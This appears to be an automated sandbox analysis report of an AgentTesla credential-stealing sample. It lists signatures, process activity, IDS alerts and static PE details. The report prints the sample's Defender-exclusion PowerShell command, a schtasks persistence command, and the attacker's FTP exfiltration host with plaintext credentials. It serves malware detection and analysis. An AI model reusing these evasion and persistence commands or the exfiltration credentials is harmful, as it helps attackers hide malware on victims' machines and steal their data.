Loading ...

Play interactive tourEdit tour

Windows Analysis Report PO02673492.exe

Overview

General Information

Sample Name:PO02673492.exe
Analysis ID:532662
MD5:c6aef3746af5a5cec52b4d15cbcbbde2
SHA1:cf88d390d092f28b4e7919e43591be5fa46a4fda
SHA256:a1eb5f93145537e3982c8f9855c6b4adccb1f8fe8b157bc85115a74c64b4b2b7
Tags:AgentTeslaexe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Sigma detected: Powershell Defender Exclusion
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Creates a window with clipboard capturing capabilities
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • PO02673492.exe (PID: 6900 cmdline: "C:\Users\user\Desktop\PO02673492.exe" MD5: C6AEF3746AF5A5CEC52B4D15CBCBBDE2)
    • powershell.exe (PID: 7112 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NzjFNaJxjqA.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 7152 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NzjFNaJxjqA" /XML "C:\Users\user\AppData\Local\Temp\tmp1C7.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • MSBuild.exe (PID: 6292 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.pfsbankgroup.com/", "Username": "owo@pfsbankgroup.com", "Password": "7ujm7ygv"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.675799485.00000000036E8000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000008.00000000.672189969.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000008.00000000.672189969.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000008.00000000.672673681.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000008.00000000.672673681.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            Click to see the 15 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.PO02673492.exe.472d180.5.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.2.PO02673492.exe.472d180.5.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                8.0.MSBuild.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  8.0.MSBuild.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    8.0.MSBuild.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 16 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicius Add Task From User AppData TempShow sources
                      Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NzjFNaJxjqA" /XML "C:\Users\user\AppData\Local\Temp\tmp1C7.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NzjFNaJxjqA" /XML "C:\Users\user\AppData\Local\Temp\tmp1C7.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PO02673492.exe" , ParentImage: C:\Users\user\Desktop\PO02673492.exe, ParentProcessId: 6900, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NzjFNaJxjqA" /XML "C:\Users\user\AppData\Local\Temp\tmp1C7.tmp, ProcessId: 7152
                      Sigma detected: Powershell Defender ExclusionShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NzjFNaJxjqA.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NzjFNaJxjqA.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO02673492.exe" , ParentImage: C:\Users\user\Desktop\PO02673492.exe, ParentProcessId: 6900, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NzjFNaJxjqA.exe, ProcessId: 7112
                      Sigma detected: Possible Applocker BypassShow sources
                      Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentCommandLine: "C:\Users\user\Desktop\PO02673492.exe" , ParentImage: C:\Users\user\Desktop\PO02673492.exe, ParentProcessId: 6900, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 6292
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NzjFNaJxjqA.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NzjFNaJxjqA.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO02673492.exe" , ParentImage: C:\Users\user\Desktop\PO02673492.exe, ParentProcessId: 6900, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NzjFNaJxjqA.exe, ProcessId: 7112
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132829301387450092.7112.DefaultAppDomain.powershell

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 0.2.PO02673492.exe.472d180.5.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.pfsbankgroup.com/", "Username": "owo@pfsbankgroup.com", "Password": "7ujm7ygv"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: PO02673492.exeReversingLabs: Detection: 44%
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\NzjFNaJxjqA.exeReversingLabs: Detection: 44%
                      Source: 8.0.MSBuild.exe.400000.2.unpackAvira: Label: TR/Spy.Gen8
                      Source: 8.0.MSBuild.exe.400000.3.unpackAvira: Label: TR/Spy.Gen8
                      Source: 0.0.PO02673492.exe.10a490c.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 8.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 0.2.PO02673492.exe.10a490c.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 8.0.MSBuild.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                      Source: 8.0.MSBuild.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 8.0.MSBuild.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: PO02673492.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                      Source: PO02673492.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.4:49842 -> 37.0.9.166:21
                      Source: TrafficSnort IDS: 2029928 ET TROJAN AgentTesla HTML System Info Report Exfil via FTP 192.168.2.4:49843 -> 37.0.9.166:35415
                      Source: Joe Sandbox ViewASN Name: WKD-ASIE WKD-ASIE
                      Source: Joe Sandbox ViewIP Address: 37.0.9.166 37.0.9.166
                      Source: global trafficTCP traffic: 192.168.2.4:49843 -> 37.0.9.166:35415
                      Source: unknownFTP traffic detected: 37.0.9.166:21 -> 192.168.2.4:49842 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:50. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:50. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:50. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:50. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.140.230.128
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.140.230.128
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.108.210
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.108.210
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.35.237.194
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                      Source: MSBuild.exe, 00000008.00000002.925075813.0000000002F81000.00000004.00000001.sdmpString found in binary or memory: ftp://ftp.pfsbankgroup.com/owo
                      Source: MSBuild.exe, 00000008.00000002.925075813.0000000002F81000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: MSBuild.exe, 00000008.00000002.925075813.0000000002F81000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: PO02673492.exe, 00000000.00000002.675799485.00000000036E8000.00000004.00000001.sdmpString found in binary or memory: http://foo/bar/shell.baml
                      Source: MSBuild.exe, 00000008.00000002.925655876.00000000032EB000.00000004.00000001.sdmpString found in binary or memory: http://ftp.pfsbankgroup.com
                      Source: PO02673492.exe, NzjFNaJxjqA.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                      Source: MSBuild.exe, 00000008.00000002.925589921.0000000003296000.00000004.00000001.sdmpString found in binary or memory: http://o0afyLkZXwIOZ85BjQfS.net
                      Source: PO02673492.exe, 00000000.00000002.675799485.00000000036E8000.00000004.00000001.sdmp, PO02673492.exe, 00000000.00000002.675946924.0000000003720000.00000004.00000001.sdmp, MSBuild.exe, 00000008.00000002.925640222.00000000032DD000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: MSBuild.exe, 00000008.00000002.925075813.0000000002F81000.00000004.00000001.sdmpString found in binary or memory: http://zGHNrH.com
                      Source: PO02673492.exe, 00000000.00000002.676785013.00000000046D1000.00000004.00000001.sdmp, MSBuild.exe, 00000008.00000000.672189969.0000000000402000.00000040.00000001.sdmp, MSBuild.exe, 00000008.00000000.672673681.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: MSBuild.exe, 00000008.00000002.925075813.0000000002F81000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownDNS traffic detected: queries for: ftp.pfsbankgroup.com

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Installs a global keyboard hookShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 8.0.MSBuild.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007b8CAE2F1Eu002d669Du002d4725u002dB977u002d2F487100FF33u007d/u003451CAF1Cu002d621Cu002d4BD8u002d96B9u002d2406CA4C2FB8.csLarge array initialization: .cctor: array initializer size 11944
                      Source: 8.0.MSBuild.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007b8CAE2F1Eu002d669Du002d4725u002dB977u002d2F487100FF33u007d/u003451CAF1Cu002d621Cu002d4BD8u002d96B9u002d2406CA4C2FB8.csLarge array initialization: .cctor: array initializer size 11944
                      Source: 8.2.MSBuild.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b8CAE2F1Eu002d669Du002d4725u002dB977u002d2F487100FF33u007d/u003451CAF1Cu002d621Cu002d4BD8u002d96B9u002d2406CA4C2FB8.csLarge array initialization: .cctor: array initializer size 11944
                      Source: 8.0.MSBuild.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b8CAE2F1Eu002d669Du002d4725u002dB977u002d2F487100FF33u007d/u003451CAF1Cu002d621Cu002d4BD8u002d96B9u002d2406CA4C2FB8.csLarge array initialization: .cctor: array initializer size 11944
                      Source: 8.0.MSBuild.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b8CAE2F1Eu002d669Du002d4725u002dB977u002d2F487100FF33u007d/u003451CAF1Cu002d621Cu002d4BD8u002d96B9u002d2406CA4C2FB8.csLarge array initialization: .cctor: array initializer size 11944
                      Source: 8.0.MSBuild.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b8CAE2F1Eu002d669Du002d4725u002dB977u002d2F487100FF33u007d/u003451CAF1Cu002d621Cu002d4BD8u002d96B9u002d2406CA4C2FB8.csLarge array initialization: .cctor: array initializer size 11944
                      Source: PO02673492.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                      Source: C:\Users\user\Desktop\PO02673492.exeCode function: 0_2_00FF24AA
                      Source: C:\Users\user\Desktop\PO02673492.exeCode function: 0_2_01B2A2C0
                      Source: C:\Users\user\Desktop\PO02673492.exeCode function: 0_2_01B2A5D8
                      Source: C:\Users\user\Desktop\PO02673492.exeCode function: 0_2_01B204D8
                      Source: C:\Users\user\Desktop\PO02673492.exeCode function: 0_2_01B20876
                      Source: C:\Users\user\Desktop\PO02673492.exeCode function: 0_2_01B28AE0
                      Source: C:\Users\user\Desktop\PO02673492.exeCode function: 0_2_01B29276
                      Source: C:\Users\user\Desktop\PO02673492.exeCode function: 0_2_01B218C0
                      Source: C:\Users\user\Desktop\PO02673492.exeCode function: 0_2_01B21BE8
                      Source: C:\Users\user\Desktop\PO02673492.exeCode function: 0_2_01B2A367
                      Source: C:\Users\user\Desktop\PO02673492.exeCode function: 0_2_01B275BA
                      Source: C:\Users\user\Desktop\PO02673492.exeCode function: 0_2_01B275C8
                      Source: C:\Users\user\Desktop\PO02673492.exeCode function: 0_2_01B21961
                      Source: C:\Users\user\Desktop\PO02673492.exeCode function: 0_2_05C71910
                      Source: C:\Users\user\Desktop\PO02673492.exeCode function: 0_2_05C75153
                      Source: C:\Users\user\Desktop\PO02673492.exeCode function: 0_2_05C75158
                      Source: C:\Users\user\Desktop\PO02673492.exeCode function: 0_2_05C70F90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00FC47A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00FC4790
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00FCD681
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_01106918
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_01105BB8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0110B1AF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_01180877
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_011870C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0118CF10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_01184AB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0118A6A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_01185300
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_01185200
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0118BEA8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_01191498
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0119F988
                      Source: PO02673492.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                      Source: PO02673492.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                      Source: NzjFNaJxjqA.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                      Source: NzjFNaJxjqA.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                      Source: PO02673492.exe, 00000000.00000002.675799485.00000000036E8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCYYqIIKKDGLHKoaUuGjZyuvEpvOnYzqkR.exe4 vs PO02673492.exe
                      Source: PO02673492.exe, 00000000.00000002.675946924.0000000003720000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs PO02673492.exe
                      Source: PO02673492.exe, 00000000.00000000.658859443.000000000109C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMCMWrapperDictiona.exe@ vs PO02673492.exe
                      Source: PO02673492.exe, 00000000.00000002.679479256.0000000006390000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs PO02673492.exe
                      Source: PO02673492.exe, 00000000.00000002.676785013.00000000046D1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCYYqIIKKDGLHKoaUuGjZyuvEpvOnYzqkR.exe4 vs PO02673492.exe
                      Source: PO02673492.exe, 00000000.00000002.676785013.00000000046D1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs PO02673492.exe
                      Source: PO02673492.exeBinary or memory string: OriginalFilenameMCMWrapperDictiona.exe@ vs PO02673492.exe
                      Source: PO02673492.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: NzjFNaJxjqA.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: PO02673492.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: NzjFNaJxjqA.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: PO02673492.exeReversingLabs: Detection: 44%
                      Source: C:\Users\user\Desktop\PO02673492.exeFile read: C:\Users\user\Desktop\PO02673492.exeJump to behavior
                      Source: PO02673492.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\PO02673492.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\PO02673492.exe "C:\Users\user\Desktop\PO02673492.exe"
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NzjFNaJxjqA.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NzjFNaJxjqA" /XML "C:\Users\user\AppData\Local\Temp\tmp1C7.tmp
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NzjFNaJxjqA.exe
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NzjFNaJxjqA" /XML "C:\Users\user\AppData\Local\Temp\tmp1C7.tmp
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Source: C:\Users\user\Desktop\PO02673492.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\PO02673492.exeFile created: C:\Users\user\AppData\Roaming\NzjFNaJxjqA.exeJump to behavior
                      Source: C:\Users\user\Desktop\PO02673492.exeFile created: C:\Users\user\AppData\Local\Temp\tmp1C7.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/9@1/1
                      Source: C:\Users\user\Desktop\PO02673492.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\PO02673492.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_01
                      Source: PO02673492.exeString found in binary or memory: images/stop.gif
                      Source: PO02673492.exeString found in binary or memory: images/stop.gif
                      Source: PO02673492.exeString found in binary or memory: images/stop.gifp
                      Source: PO02673492.exeString found in binary or memory: images/stop.gifp
                      Source: PO02673492.exeString found in binary or memory: Images/stop.gif
                      Source: PO02673492.exeString found in binary or memory: Images/stop.gif
                      Source: 8.0.MSBuild.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
